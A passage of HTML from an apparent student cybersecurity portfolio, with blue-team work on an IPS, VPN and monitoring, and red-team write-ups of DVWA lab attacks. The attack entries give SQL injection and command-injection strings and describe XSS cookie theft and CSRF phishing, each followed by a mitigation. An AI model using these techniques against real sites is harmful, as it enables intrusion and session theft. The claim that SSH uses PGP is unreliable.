          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
